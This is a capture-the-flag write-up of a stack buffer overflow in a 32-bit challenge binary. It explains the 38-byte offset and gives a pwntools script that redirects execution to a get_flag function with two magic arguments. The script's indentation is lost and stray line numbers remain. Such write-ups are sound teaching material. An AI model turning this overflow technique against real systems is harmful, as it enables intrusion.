Purpose : Get The Flag
We see that no protection is enabled and binary is 32-bit.
Start by analyzing the main function. We can see that it prints the msg and then takes values from the user and store it in a character buffer of size 100. Later down the program, we can see that after some checks buffer is passed to the “safe” function.
In the safe function we can see that the pass argument is copied to a variable that is on the stack because it has a 30 buffer size and we can overflow it
After found the correct padd value (38{ 30 ( buff size ) + 4 (saved ebp ) + 4( param_1 ) } ) we start writing exploit after going through function list found “get_flag” function . Which will read the flag but only print if the correct argument is paced which is “0xdeadbeef” and “0xcaf3b33f”.
Now complicated things are out of the way. My favorite part crafting the exploit.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#!/usr/bin/python3
from pwn import *
import struct
def start(argv=[], *a, **kw):
if args.GDB:
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: #
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else:
return process([exe] + argv, *a, **kw)
gdbscript = '''
continue
'''.format(**locals())
exe = './fued'; elf = context.binary = ELF(exe, checksec=False);
io = start()
offset = 38
payload = b"A"*38+p32(0x080491f6)+b"A"*4+p32(0xdeadbeef)+p32(0xcaf3b33f)
io.sendlineafter(b"Enter the key that you received when registering:",payload)
io.interactive()
“ブーム”。 旗を受け取った
